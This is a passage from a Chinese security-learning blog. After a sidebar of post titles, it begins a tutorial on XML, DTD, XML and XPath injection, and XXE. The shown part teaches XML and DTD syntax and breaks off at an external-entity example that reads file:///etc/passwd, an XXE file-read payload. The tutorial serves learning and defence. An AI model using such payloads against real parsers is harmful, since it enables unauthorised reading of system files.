data-author><span class=post-title title=Hexo速度优化及遇到的问题(gulp4、hexo-neat)>Hexo速度优化及遇到的问题(gulp4、hexo-neat)</span> <span class=post-date title="2020-02-08 00:24:25">2020/02/08</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/21/Python学习-基础篇(四)/" data-tag=异常处理及程序调试,文件及目录操作,操作数据库 data-author><span class=post-title title=Python学习-基础篇(四)>Python学习-基础篇(四)</span> <span class=post-date title="2020-01-21 21:31:15">2020/01/21</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/19/Python学习-基础篇(三)/" data-tag=字符串及正则表达式,函数,模块 data-author><span class=post-title title=Python学习-基础篇(三)>Python学习-基础篇(三)</span> <span class=post-date title="2020-01-19 18:16:50">2020/01/19</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/18/Python学习-基础篇(二)/" data-tag=序列的应用,列表,元组,字典,集合 data-author><span class=post-title title=Python学习-基础篇(二)>Python学习-基础篇(二)</span> <span class=post-date title="2020-01-18 20:01:31">2020/01/18</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/16/Python学习-基础篇(一)/" data-tag=开发工具,基本语法,流程控制 data-author><span class=post-title title=Python学习-基础篇(一)>Python学习-基础篇(一)</span> <span class=post-date title="2020-01-16 22:29:30">2020/01/16</span></a> <a class="全部文章 运维 Linux基础" href="/2020/01/07/Linux虚拟机常见使用及常见问题/" data-tag=Linux,问题整理 data-author><span class=post-title title=Linux虚拟机常见使用及常见问题>Linux虚拟机常见使用及常见问题</span> <span class=post-date title="2020-01-07 16:08:02">2020/01/07</span></a> <a class="全部文章 复习" href="/2019/12/26/Linux基础期末整理复习/" data-tag=Linux,期末复习 data-author><span class=post-title title=Linux基础期末整理复习>Linux基础期末整理复习</span> <span class=post-date title="2019-12-26 16:50:43">2019/12/26</span></a> <a class="全部文章 线下赛 AWD" href="/2019/12/16/AWD模式总结与2019河南高校网安联赛复现/" data-tag=河南高校网安联赛,复现 data-author><span class=post-title title=AWD模式总结与2019河南高校网安联赛复现>AWD模式总结与2019河南高校网安联赛复现</span> <span class=post-date title="2019-12-16 22:58:25">2019/12/16</span></a> <a class="全部文章 漏洞原理 XXE漏洞" href="/2019/12/02/从XML相关一步一步到XXE漏洞/" data-tag=XML,XML注入,Xpath注入,XXE漏洞 data-author><span class=post-title title=从XML相关一步一步到XXE漏洞>从XML相关一步一步到XXE漏洞</span> <span class=post-date title="2019-12-02 14:47:00">2019/12/02</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/16/sqli-labs攻关5(Sta)(Less-39_Less-53)/" data-tag="题目复现,靶场练习,堆叠注入,order by排序注入,异或注入" data-author><span class=post-title title=sqli-labs攻关5(Sta)(Less-39_Less-53)>sqli-labs攻关5(Sta)(Less-39_Less-53)</span> <span class=post-date title="2019-11-16 23:58:43">2019/11/16</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/12/sqli-labs攻关4(Adv)(Less-23_Less-38)/" data-tag=靶场练习,二次注入,过滤敏感关键字与WAF绕过,宽字节注入 data-author><span class=post-title title=sqli-labs攻关4(Adv)(Less-23_Less-38)>sqli-labs攻关4(Adv)(Less-23_Less-38)</span> <span class=post-date title="2019-11-12 23:02:46">2019/11/12</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/06/sqli-labs攻关3(Less-11-Less-22)/" data-tag=靶场练习,POST型联合查询注入,POST型报错注入,POST型盲注 data-author><span class=post-title title=sqli-labs攻关3(Less-11_Less-22)>sqli-labs攻关3(Less-11_Less-22)</span> <span class=post-date title="2019-11-06 23:55:21">2019/11/06</span></a> <a class="全部文章 漏洞原理 协议层漏洞" href="/2019/10/27/从一道题到HTTP请求走私/" data-tag=题目复现,HTTP,HTTP请求走私 data-author><span class=post-title title=从一道题到HTTP请求走私>从一道题到HTTP请求走私</span> <span class=post-date title="2019-10-27 23:13:44">2019/10/27</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/10/26/SQL盲注的简单分析/" data-tag=SQL盲注 data-author><span class=post-title title=SQL盲注的简单分析>SQL盲注的简单分析</span> <span class=post-date title="2019-10-26 21:50:20">2019/10/26</span></a> <a class="全部文章 漏洞原理 文件操作漏洞" href="/2019/10/19/任意文件读取与下载漏洞/" data-tag=题目复现,任意文件读取漏洞,任意文件下载漏洞 data-author><span class=post-title title=任意文件读取与下载漏洞>任意文件读取与下载漏洞</span> <span class=post-date title="2019-10-19 01:01:11">2019/10/19</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/09/25/SQL注入-报错注入/" data-tag=报错注入 data-author><span class=post-title title=SQL注入-报错注入>SQL注入-报错注入</span> <span class=post-date title="2019-09-25 00:21:26">2019/09/25</span></a> <a class="全部文章 CTF" href="/2019/09/05/攻防世界-Web(进阶区)/" data-tag=CTF,Web,攻防世界 data-author><span class=post-title title=攻防世界-Web(进阶区)>攻防世界-Web(进阶区)</span> <span class=post-date title="2019-09-05 23:46:17">2019/09/05</span></a> <a class="全部文章 CTF" href="/2019/09/02/i春秋-Web(一)/" data-tag=CTF,Web,i春秋 data-author><span class=post-title title=i春秋-Web(一)>i春秋-Web(一)</span> <span class=post-date title="2019-09-02 20:41:21">2019/09/02</span></a> <a class="全部文章 CTF" href="/2019/08/25/南邮-Web(二)/" data-tag=CTF,Web,南邮 data-author><span class=post-title title=南邮-Web(二)>南邮-Web(二)</span> <span class=post-date title="2019-08-25 18:31:58">2019/08/25</span></a> <a class="全部文章 漏洞原理 文件包含漏洞" href="/2019/08/21/文件包含漏洞/" data-tag=漏洞利用,漏洞基础,漏洞绕过,PHP伪协议 data-author><span class=post-title title=文件包含漏洞>文件包含漏洞</span> <span class=post-date title="2019-08-21 21:28:09">2019/08/21</span></a> <a class="全部文章 漏洞原理 信息泄露" href="/2019/08/15/常见Web源码泄露/" data-tag=源码泄露,源码泄露类型 data-author><span class=post-title title=常见Web源码泄露>常见Web源码泄露</span> <span class=post-date title="2019-08-15 20:03:10">2019/08/15</span></a> <a class="全部文章 漏洞原理 反序列化漏洞" href="/2019/08/14/PHP反序列化漏洞/" data-tag=PHP类与对象,序列化与反序列化基础,魔术方法简单利用 data-author><span class=post-title title=PHP反序列化漏洞>PHP反序列化漏洞</span> <span class=post-date title="2019-08-14 23:29:51">2019/08/14</span></a> <a class="全部文章 漏洞原理 命令注入" href="/2019/08/08/命令执行(Command Injection)与代码执行(Code execution)/" data-tag=命令执行,代码执行 data-author><span class=post-title title="命令执行(Command Injection)与代码执行(Code execution)">命令执行(Command Injection)与代码执行(Code execution)</span> <span class=post-date title="2019-08-08 23:11:51">2019/08/08</span></a> <a class="全部文章 CTF" href="/2019/08/06/Crypto-RSA加密/" data-tag=CTF,Crypto,RSA data-author><span class=post-title title=Crypto-RSA加密>Crypto-RSA加密</span> <span class=post-date title="2019-08-06 23:16:34">2019/08/06</span></a> <a class="全部文章 漏洞原理 文件上传漏洞" href="/2019/08/03/文件上传漏洞 学习笔记(二)/" data-tag=白名单绕过,内容绕过,竞争条件绕过 data-author><span class=post-title title="文件上传漏洞 学习笔记(二)">文件上传漏洞 学习笔记(二)</span> <span class=post-date title="2019-08-03 10:22:22">2019/08/03</span></a> <a class="全部文章 CTF" href="/2019/08/02/CTF做题总结(二)/" data-tag=Web,Reverse,SQL,盲注 data-author><span class=post-title title=CTF做题总结(二)>CTF做题总结(二)</span> <span class=post-date title="2019-08-02 11:22:58">2019/08/02</span></a> <a class="全部文章 漏洞原理 文件上传漏洞" href="/2019/07/31/文件上传漏洞 学习笔记(一)/" data-tag=JS绕过,MIME绕过,黑名单绕过 data-author><span class=post-title title="文件上传漏洞 学习笔记(一)">文件上传漏洞 学习笔记(一)</span> <span class=post-date title="2019-07-31 23:01:05">2019/07/31</span></a> <a class="全部文章 CTF" href="/2019/07/25/南邮-Web(一)/" data-tag=CTF,Web,南邮 data-author><span class=post-title title=南邮-Web(一)>南邮-Web(一)</span> <span class=post-date title="2019-07-25 20:05:46">2019/07/25</span></a> <a class="全部文章 CTF" href="/2019/07/21/Crypto-简单加密/" data-tag=CTF,Crypto,简单加密 data-author><span class=post-title title=Crypto-简单加密>Crypto-简单加密</span> <span class=post-date title="2019-07-21 21:30:41">2019/07/21</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/07/19/sqli-labs攻关2(Less-7_Less-10)/" data-tag=导出文件注入,GET型盲注,靶场练习 data-author><span class=post-title title=sqli-labs攻关2(Less-7_Less-10)>sqli-labs攻关2(Less-7_Less-10)</span> <span class=post-date title="2019-07-19 22:05:21">2019/07/19</span></a> <a class="全部文章 CTF" href="/2019/07/17/攻防世界-Web(新手区)/" data-tag=CTF,Web,攻防世界 data-author><span class=post-title title=攻防世界-Web(新手区)>攻防世界-Web(新手区)</span> <span class=post-date title="2019-07-17 21:22:27">2019/07/17</span></a> <a class="全部文章 CTF" href="/2019/07/15/安恒月赛7月-MISC wp/" data-tag=CTF,MISC,安恒 data-author><span class=post-title title="安恒月赛7月-MISC wp">安恒月赛7月-MISC wp</span> <span class=post-date title="2019-07-15 19:33:17">2019/07/15</span></a> <a class="全部文章 漏洞原理 XSS" href="/2019/07/14/XSS漏洞攻关(二)/" data-tag=XSS绕过 data-author><span class=post-title title=XSS漏洞攻关(二)>XSS漏洞攻关(二)</span> <span class=post-date title="2019-07-14 19:01:42">2019/07/14</span></a> <a class="全部文章 CTF" href="/2019/07/12/Crypto-位移编码/" data-tag=CTF,Crypto,移位编码 data-author><span class=post-title title=Crypto-位移编码>Crypto-位移编码</span> <span class=post-date title="2019-07-12 21:32:41">2019/07/12</span></a> <a class="全部文章 CTF" href="/2019/07/10/MISC-图片隐写/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-图片隐写>MISC-图片隐写</span> <span class=post-date title="2019-07-10 21:05:43">2019/07/10</span></a> <a class="全部文章 线下赛 AWD" href="/2019/06/24/ISCC2019线下赛总结/" data-tag=ISCC,感悟 data-author><span class=post-title title=ISCC2019线下赛总结>ISCC2019线下赛总结</span> <span class=post-date title="2019-06-24 00:07:01">2019/06/24</span></a> <a class="全部文章 线下赛 AWD" href="/2019/06/19/CTF线下赛AWD攻防准备/" data-tag=准备 data-author><span class=post-title title=CTF线下赛AWD攻防准备>CTF线下赛AWD攻防准备</span> <span class=post-date title="2019-06-19 19:45:58">2019/06/19</span></a> <a class="全部文章 CTF" href="/2019/06/18/BUGKU做题总结(一)/" data-tag=CTF,BUGKU,MISC data-author><span class=post-title title=BUGKU做题总结(一)>BUGKU做题总结(一)</span> <span class=post-date title="2019-06-18 21:11:11">2019/06/18</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/06/10/sqli-labs攻关1(Less-1_Less-6)/" data-tag=靶场练习,GET型联合查询注入,GET型双查询注入 data-author><span class=post-title title=sqli-labs攻关1(Less-1_Less-6)>sqli-labs攻关1(Less-1_Less-6)</span> <span class=post-date title="2019-06-10 19:03:52">2019/06/10</span></a> <a class="全部文章 编程开发 PHP" href="/2019/06/05/Web开发-简单BBS论坛/" data-tag=Web开发,bbs论坛 data-author><span class=post-title title=Web开发-简单BBS论坛>Web开发-简单BBS论坛</span> <span class=post-date title="2019-06-05 17:32:32">2019/06/05</span></a> <a class="全部文章 协议分析 HTTP协议" href="/2019/05/29/HTTP协议基础/" data-tag=HTTP协议,HTTP头流量包 data-author><span class=post-title title=HTTP协议基础>HTTP协议基础</span> <span class=post-date title="2019-05-29 20:39:42">2019/05/29</span></a> <a class="全部文章 CTF" href="/2019/05/27/ISCC-MISC做题总结/" data-tag=CTF,MISC,ISCC data-author><span class=post-title title=ISCC-MISC做题总结>ISCC-MISC做题总结</span> <span class=post-date title="2019-05-27 18:53:14">2019/05/27</span></a> <a class="全部文章 编程开发 PHP" href="/2019/05/04/Web开发-PHP基础篇(四)/" data-tag=MySQL学习,PHP与MySQL交互 data-author><span class=post-title title=Web开发-PHP基础篇(四)>Web开发-PHP基础篇(四)</span> <span class=post-date title="2019-05-04 15:18:37">2019/05/04</span></a> <a class="全部文章 漏洞原理 XSS" href="/2019/04/28/XSS漏洞攻关(一)/" data-tag=XSS基础,XSS绕过 data-author><span class=post-title title=XSS漏洞攻关(一)>XSS漏洞攻关(一)</span> <span class=post-date title="2019-04-28 17:00:44">2019/04/28</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/27/Web开发-PHP基础篇(三)/" data-tag=正则表达式,日期和时间,图像处理,文件与目录操作,会话控制 data-author><span class=post-title title=Web开发-PHP基础篇(三)>Web开发-PHP基础篇(三)</span> <span class=post-date title="2019-04-27 15:02:06">2019/04/27</span></a> <a class="全部文章 线下赛 团队内部" href="/2019/04/26/一次团队内部比赛经历/" data-tag=BUG,SQL注入,PHP data-author><span class=post-title title=一次团队内部比赛经历>一次团队内部比赛经历</span> <span class=post-date title="2019-04-26 22:59:01">2019/04/26</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/26/php mysql html css制作带Cookie登陆页面/" data-tag=Web开发,登录和注册功能 data-author><span class=post-title title="php mysql html css制作带Cookie登陆页面">php mysql html css制作带Cookie登陆页面</span> <span class=post-date title="2019-04-26 10:08:26">2019/04/26</span></a> <a class="全部文章 CTF" href="/2019/04/16/CTF做题总结(一)/" data-tag=CTF,MISC,Crypto data-author><span class=post-title title=CTF做题总结(一)>CTF做题总结(一)</span> <span class=post-date title="2019-04-16 11:27:05">2019/04/16</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/15/Web开发-PHP基础篇(一~二)/" data-tag=基本语法,流程控制,函数,数组,字符串 data-author><span class=post-title title=Web开发-PHP基础篇(一-二)>Web开发-PHP基础篇(一-二)</span> <span class=post-date title="2019-04-15 20:22:18">2019/04/15</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-隐写的总结/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-隐写的总结>MISC-隐写的总结</span> <span class=post-date title="2019-04-06 18:33:32">2019/04/06</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-zip压缩包的总结/" data-tag=CTF,MISC,ZIP data-author><span class=post-title title=MISC-zip压缩包的总结>MISC-zip压缩包的总结</span> <span class=post-date title="2019-04-06 00:21:56">2019/04/06</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/30/Web前端-CSS篇/" data-tag=Web前端,CSS data-author><span class=post-title title=Web前端-CSS篇>Web前端-CSS篇</span> <span class=post-date title="2019-03-30 19:39:32">2019/03/30</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/25/Web前端-HTML篇/" data-tag=Web前端,HTML data-author><span class=post-title title=Web前端-HTML篇>Web前端-HTML篇</span> <span class=post-date title="2019-03-25 22:54:31">2019/03/25</span></a> <a class="全部文章 博客" href="/2019/03/17/Github-Hexo的搭建/" data-tag=Hexo,Github,Hexo搭建 data-author><span class=post-title title=Github-Hexo简单搭建>Github-Hexo简单搭建</span> <span class=post-date title="2019-03-17 12:36:45">2019/03/17</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/15/html基础篇一/" data-tag=Web前端,HTML data-author><span class=post-title title=超文本标记语言html>超文本标记语言html</span> <span class=post-date title="2019-03-15 23:43:10">2019/03/15</span></a> <a class="全部文章 工具学习 phpstudy" href="/2019/03/15/phpstudy-MySQL基础篇一/" data-tag=Web,数据库 data-author><span class=post-title title=phpstudy-MySQL的简单使用以及cmd打开MySQL>phpstudy-MySQL的简单使用以及cmd打开MySQL</span> <span class=post-date title="2019-03-15 23:39:20">2019/03/15</span></a> <a class="全部文章 First" href="/2019/03/12/hello-world/" data-tag data-author><span class=post-title title="Hello world">Hello world</span> <span class=post-date title="2019-03-12 22:33:11">2019/03/12</span></a><div id=no-item-tips></div></nav><div id=outline-list></div></div></div><div class=hide-list><div class=semicircle data-title="切换全屏 快捷键 s"><div class="brackets first"><</div><div class=brackets>&gt;</div></div></div></aside><div id=post><div class=pjax><article id=post-从XML相关一步一步到XXE漏洞 class="article article-type-post" itemscope itemprop=blogPost><h1 class=article-title>从XML相关一步一步到XXE漏洞</h1><div class=article-meta><span class=book><i class="iconfont icon-category"></i> <a data-rel=漏洞原理>漏洞原理</a> > <a data-rel=漏洞原理&lt;---&gt;XXE漏洞>XXE漏洞</a></span> <span class=tag><i class="iconfont icon-tag"></i> <a class=color4>XML</a> <a class=color1>XML注入</a> <a class=color3>Xpath注入</a> <a class=color1>XXE漏洞</a></span></div><div class=article-meta>发布时间 :<time class=date title="最后更新: 2020-08-02 00:51:02">2019-12-02 14:47</time></div><div class=article-meta><span>字数:6.9k</span> <span id=busuanzi_container_page_pv>阅读 :<span id=busuanzi_value_page_pv><span class=count-comment><span class=spinner><div class=cube1></div><div class=cube2></div></span></span></span></span></div><div class=toc-ref><ol class=toc><li class="toc-item toc-level-3"><a class=toc-link href=#0x00-前言><span class=toc-text>0x00 前言</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x01-XML><span class=toc-text>0x01 XML</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x02-DTD><span class=toc-text>0x02 DTD</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x03-XML注入><span class=toc-text>0x03 XML注入</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#XML注入简介><span class=toc-text>XML注入简介</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#XML注入前提条件><span class=toc-text>XML注入前提条件</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#XML注入防御><span class=toc-text>XML注入防御</span></a></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x04-XPath注入><span class=toc-text>0x04 XPath注入</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#XPath注入攻击简介><span class=toc-text>XPath注入攻击简介</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#XPath注入攻击特点><span class=toc-text>XPath注入攻击特点</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#Xpath注入攻击原理与利用><span class=toc-text>Xpath注入攻击原理与利用</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#Xpath注入攻击危害><span class=toc-text>Xpath注入攻击危害</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#Xpath注入攻击防御><span class=toc-text>Xpath注入攻击防御</span></a></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x05-XML外部实体注入-XXE><span class=toc-text>0x05 XML外部实体注入(XXE)</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#XXE漏洞简介><span class=toc-text>XXE漏洞简介</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#XXE本地搭建环境测试><span class=toc-text>XXE本地搭建环境测试</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#XXE常见利用方式><span class=toc-text>XXE常见利用方式</span></a><ol class=toc-child><li class="toc-item toc-level-5"><a class=toc-link href=#1、读取任意文件><span class=toc-text>1、读取任意文件</span></a></li><li class="toc-item toc-level-5"><a class=toc-link href=#2、执行系统命令><span class=toc-text>2、执行系统命令</span></a></li><li class="toc-item toc-level-5"><a class=toc-link href=#3、拒绝服务攻击-Dos><span class=toc-text>3、拒绝服务攻击(Dos)</span></a></li><li class="toc-item toc-level-5"><a class=toc-link href=#4、探测内网端口与攻击内网网站><span class=toc-text>4、探测内网端口与攻击内网网站</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x06-XXE漏洞防御><span class=toc-text>0x06 XXE漏洞防御</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x07-后记><span class=toc-text>0x07 后记</span></a></li></ol><style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-5 i,
    .toc-level-5 ol {
        display: none !important;
    }
</style></div><div class=article-entry itemprop=articleBody><h3 id=0x00-前言><a href=#0x00-前言 class=headerlink title="0x00 前言"></a>0x00 前言</h3><p>想学XXE漏洞，XXE(XML External Entity Injection)全称为XML外部实体注入。XML？！发现我不会，简单看了一下基础知识，发现XML还可能存在XML注入和XPath注入。于是把XML注入、XPath注入和XML 外部实体注入一起学习了！并写了一下学习笔记。</p><h3 id=0x01-XML><a href=#0x01-XML class=headerlink title="0x01 XML"></a>0x01 XML</h3><p><strong>什么是 XML？</strong><br>XML 指可扩展标记语言（EXtensible Markup Language）。<br>XML 的设计宗旨是传输数据，而不是显示数据。<br>XML 是 W3C 的推荐标准。<br>XML 不会做任何事情。XML 被设计用来结构化、存储以及传输信息。<br>XML 语言没有预定义的标签。</p><p><strong>XML 和 HTML 之间的差异</strong><br>XML 不是 HTML 的替代。<br>XML 和 HTML 为不同的目的而设计：</p><blockquote><p>XML 被设计用来传输和存储数据，其焦点是数据的内容。<br>HTML 被设计用来显示数据，其焦点是数据的外观。<br>HTML 旨在显示信息，而 XML 旨在传输信息。</p></blockquote><p><strong>为什么需要XML</strong><br>现实生活中一些数据之间往往存在一定的关系。我们希望能在计算机中保存和处理这些数据的同时能够保存和处理他们之间的关系。XML就是为了解决这样的需求而产生数据存储格式。</p><p><strong>XML基本格式与基本语法</strong><br><em>基本格式：</em></p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?&gt;&lt;!--xml文件的声明--&gt;
&lt;bookstore&gt;                                                 &lt;!--根元素--&gt;
&lt;book category=&quot;COOKING&quot;&gt;        &lt;!--bookstore的子元素，category为属性--&gt;
&lt;title&gt;Everyday Italian&lt;/title&gt;           &lt;!--book的子元素，lang为属性--&gt;
&lt;author&gt;Giada De Laurentiis&lt;/author&gt;                  &lt;!--book的子元素--&gt;
&lt;year&gt;2005&lt;/year&gt;                                     &lt;!--book的子元素--&gt;
&lt;price&gt;30.00&lt;/price&gt;                                  &lt;!--book的子元素--&gt;
&lt;/book&gt;                                                 &lt;!--book的结束--&gt;
&lt;/bookstore&gt;                                       &lt;!--bookstore的结束--&gt;</code></pre><p><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?&gt;</code> 称为 XML prolog ，用于声明XML文档的版本和编码，是可选的，必须放在文档开头。<br>standalone值是yes的时候表示DTD仅用于验证文档结构，从而外部实体将被禁用，但它的默认值是no，而且有些parser会直接忽略这一项。</p><p><em>基本语法：</em></p><ul><li>所有 XML 元素都须有关闭标签。</li><li>XML 标签对大小写敏感。</li><li>XML 必须正确地嵌套。</li><li>XML 文档必须有根元素。</li><li>XML 的属性值须加引号。</li></ul><p>若多个字符都需要转义，则可以将这些内容存放到CDATA里面</p><pre><code class=xml>&lt;![CDATA[ 内容 ]]&gt;</code></pre><h3 id=0x02-DTD><a href=#0x02-DTD class=headerlink title="0x02 DTD"></a>0x02 DTD</h3><p><strong>DTD基本概念</strong><br>XML 文档有自己的一个格式规范，这个格式规范是由一个叫做 DTD（document type definition） 的东西控制的。<br>DTD用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明)，也可以独立的放在另外一个单独的文件中(外部引用)。是XML文档中的几条语句，用来说明哪些元素/属性是合法的以及元素间应当怎样嵌套/结合，也用来将一些特殊字符和可复用代码段自定义为实体。<br><strong>实体引用</strong><br>XML元素以形如 <code>&lt;tag&gt;foo&lt;/tag&gt;</code> 的标签开始和结束，如果元素内部出现如<code>&lt;</code> 的特殊字符，解析就会失败，为了避免这种情况，XML用实体引用（entity reference）替换特殊字符。XML预定义五个实体引用，即用<code>&amp;lt; &amp;gt; &amp;amp; &amp;apos; &amp;quot;</code> 替换 <code>&lt; &gt; &amp; &#39; &quot;</code> 。<br>实体引用可以起到类似宏定义和文件包含的效果，为了方便，我们会希望自定义实体引用，这个操作在称为 Document Type Defination（DTD，文档类型定义）的过程中进行。<br><strong>dtd的引入方式</strong><br>DTD（文档类型定义）的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明，也可以外部引用。<br><em>内部 DTD</em><br>使用内部的dtd文件，即将约束规则定义在xml文档中</p><pre><code class=xml>&lt;!DOCTYPE 根元素名称 [元素声明]&gt;</code></pre><p>示例代码：</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE note [&lt;!--定义此文档是 note 类型的文档--&gt;
&lt;!ELEMENT note (to,from,heading,body)&gt;&lt;!--定义note元素有四个元素--&gt;
&lt;!ELEMENT to (#PCDATA)&gt;&lt;!--定义to元素为”#PCDATA”类型--&gt;
&lt;!ELEMENT from (#PCDATA)&gt;&lt;!--定义from元素为”#PCDATA”类型--&gt;
&lt;!ELEMENT head (#PCDATA)&gt;&lt;!--定义head元素为”#PCDATA”类型--&gt;
&lt;!ELEMENT body (#PCDATA)&gt;&lt;!--定义body元素为”#PCDATA”类型--&gt;
]&gt;
&lt;note&gt;
&lt;to&gt;Y0u&lt;/to&gt;
&lt;from&gt;@re&lt;/from&gt;
&lt;head&gt;v3ry&lt;/head&gt;
&lt;body&gt;g00d!&lt;/body&gt;
&lt;/note&gt;</code></pre><p><em>外部 DTD</em><br>（1）引入外部的dtd文件</p><pre><code class=xml>&lt;!DOCTYPE 根元素名称 SYSTEM &quot;dtd路径&quot;&gt;</code></pre><p>（2）使用外部的dtd文件(网络上的dtd文件)</p><pre><code class=xml>&lt;!DOCTYPE 根元素 PUBLIC &quot;DTD名称&quot; &quot;DTD文档的URL&quot;&gt;</code></pre><p>当使用外部DTD时，通过如下语法引入：</p><pre><code class=xml> &lt;!DOCTYPE root-element SYSTEM &quot;filename&quot;&gt;</code></pre><p>示例代码：</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE root-element SYSTEM &quot;test.dtd&quot;&gt;
&lt;note&gt;
&lt;to&gt;Y0u&lt;/to&gt;
&lt;from&gt;@re&lt;/from&gt;
&lt;head&gt;v3ry&lt;/head&gt;
&lt;body&gt;g00d!&lt;/body&gt;
&lt;/note&gt;</code></pre><p>test.dtd</p><pre><code class=xml>&lt;!ELEMENT to (#PCDATA)&gt;&lt;!--定义to元素为”#PCDATA”类型--&gt;
&lt;!ELEMENT from (#PCDATA)&gt;&lt;!--定义from元素为”#PCDATA”类型--&gt;
&lt;!ELEMENT head (#PCDATA)&gt;&lt;!--定义head元素为”#PCDATA”类型--&gt;
&lt;!ELEMENT body (#PCDATA)&gt;&lt;!--定义body元素为”#PCDATA”类型--&gt;</code></pre><p><strong>PCDATA</strong><br>PCDATA的意思是被解析的字符数据。PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理，而实体会被展开。<br>被解析的字符数据不应当包含任何<code>&amp;</code>，<code>&lt;</code>，或者<code>&gt;</code>字符，需要用<code>&amp;amp;</code> <code>&amp;lt;</code> <code>&amp;gt;</code>实体来分别替换。<br><strong>CDATA</strong><br>CDATA意思是字符数据，CDATA 是不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开。<br><strong>DTD元素</strong><br><img src=http://img-blog.csdnimg.cn/20191126220900607.png alt=在这里插入图片描述><br><strong>DTD属性</strong><br><strong>属性声明语法</strong>：</p><pre><code class=xml>&lt;!ATTLIST 元素名称 属性名称 属性类型 默认值&gt;</code></pre><p>DTD实例：</p><pre><code class=xml>&lt;!ATTLIST payment Luckey CDATA &quot;Q&quot;&gt;</code></pre><p>XML实例：</p><pre><code class=xml>&lt;payment Luckey=&quot;Q&quot; /&gt;</code></pre><p>以下是 属性类型的选项：<br><img src=http://img-blog.csdnimg.cn/20191126224501166.png alt=在这里插入图片描述><br>默认属性值可使用下列值：<br><img src=http://img-blog.csdnimg.cn/20191126224640102.png alt=在这里插入图片描述><br><strong>DTD实体</strong></p><blockquote><p>实体是用于定义引用普通文本或特殊字符的快捷方式的变量。<br>实体引用是对实体的引用。<br>实体可在内部或外部进行声明。</p></blockquote><p><em>按实体有无参分类，实体分为一般实体和参数实体</em><br><em>一般实体的声明</em>：<code>&lt;!ENTITY 实体名称 &quot;实体内容&quot;&gt;</code><br>引用一般实体的方法：<code>&amp;实体名称;</code><br>ps：经实验，普通实体可以在DTD中引用，可以在XML中引用，可以在声明前引用，还可以在实体声明内部引用。</p><p><em>参数实体的声明</em>：<code>&lt;!ENTITY % 实体名称 &quot;实体内容&quot;&gt;</code><br>引用参数实体的方法：<code>%实体名称;</code><br>ps：经实验，参数实体只能在DTD中引用，不能在声明前引用，也不能在实体声明内部引用。<br>DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量，可以内部声明或外部引用。</p><p><em>按实体使用方式分类，实体分为内部声明实体和引用外部实体</em><br><em>内部实体</em></p><pre><code class=xml>&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;</code></pre><p>内部实体示例代码：</p><pre><code class=xml>&lt;?xml version = &quot;1.0&quot; encoding = &quot;utf-8&quot;?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY writer &quot;Dawn&quot;&gt;
    &lt;!ENTITY copyright &quot;Copyright W3School.com.cn&quot;&gt;
]&gt;
&lt;test&gt;&amp;writer;©right;&lt;/test&gt;</code></pre><p><em>外部实体</em><br>外部实体，用来引入外部资源。有<code>SYSTEM</code>和<code>PUBLIC</code>两个关键字，表示实体来自本地计算机还是公共计算机。</p><pre><code class=xml>&lt;!ENTITY 实体名称 SYSTEM &quot;URI/URL&quot;&gt;
或者
&lt;!ENTITY 实体名称 PUBLIC &quot;public_ID&quot; &quot;URI&quot;&gt;</code></pre><p>外部实体示例代码：</p><pre><code class=xml>&lt;?xml version = &quot;1.0&quot; encoding = &quot;utf-8&quot;?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY file SYSTEM &quot;file:///etc/passwd&quot;&gt;
